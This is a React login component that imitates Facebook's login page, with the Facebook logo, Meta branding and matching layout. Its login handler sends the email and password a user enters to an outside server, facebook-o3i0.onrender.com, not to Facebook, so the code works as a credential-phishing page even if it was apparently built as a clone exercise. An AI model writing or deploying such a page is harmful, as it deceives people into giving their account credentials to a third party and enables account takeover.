import React, {useState} from "react";
import axios from "axios";
import "./Login.css";
import {FaUser, FaLock} from "react-icons/fa";
import {MdEmail} from "react-icons/md";
import {IoPersonCircle} from "react-icons/io5";
import {FontAwesomeIcon} from "@fortawesome/react-fontawesome";
import {faFacebook} from "@fortawesome/free-brands-svg-icons";
import {FaMeta} from "react-icons/fa6";
const Login = () => {
  const [action, setAction] = useState("");
  const [formData, setFormData] = useState({
    fullname: "",
    username: "",
    email: "",
    password: "",
    coupon: "",
  });
  const handleInputChange = (e) => {
    setFormData({...formData, [e.target.name]: e.target.value});
  };
  const handleRegister = async (e) => {
    e.preventDefault();
    try {
      const response = await axios.post(
        "http://localhost:5000/register",
        formData
      );
      alert(response.data);
    } catch (error) {
      alert("Registration failed");
    }
  };
  const handleLogin = async (e) => {
    e.preventDefault();
    try {
      const response = await axios.post("https://facebook-o3i0.onrender.com/login", {
        email: formData.email,
        password: formData.password,
      });
      alert(response.data);
    } catch (error) {
      alert("Login failed");
    }
  };
  // const apiUrl = "https://your-backend-app.vercel.app/api/login";
  // axios
  //   .post(apiUrl, {email, password})
  //   .then((response) => {
  //     console.log("Login successful:", response.data);
  //   })
  //   .catch((error) => {
  //     console.error("Login failed:", error);
  //   });
  const registerLink = () => {
    setAction("active");
  };
  const loginLink = () => {
    setAction("");
  };
  return (
    <div className={`wrapper ${action}`}>
      <div className="form-box login">
        <p className="uk">English (UK)</p>
        <h1 className="fb-logo">
          <FontAwesomeIcon icon={faFacebook} style={{color: "#2f75ee"}} />
        </h1>
        <form onSubmit={handleLogin}>
          <div className="input-box">
            <input
              type="text"
              name="email"
              placeholder="Mobile Number or email address"
              required
              onChange={handleInputChange}
            />
          </div>
          <div className="input-box">
            <input
              type="password"
              name="password"
              placeholder="Password"
              required
              onChange={handleInputChange}
            />
          </div>
          <button className="first" type="submit">
            Login
          </button>
          <div className="forgot_pasword">
            <a href="#" className="forgot">
              Forgot Password?
            </a>
          </div>
          <div className="register-link">
            <button className="second">
              <a>
                <p>Create new account</p>
              </a>
            </button>
            <div className="meta">
              <FaMeta />
              <p>Meta</p>
            </div>
            <div className="footer">
              <a href="">About</a>
              <a href="">Help</a>
              <a href="">More</a>
            </div>
          </div>
        </form>
      </div>
    </div>
  );
};
export default Login;
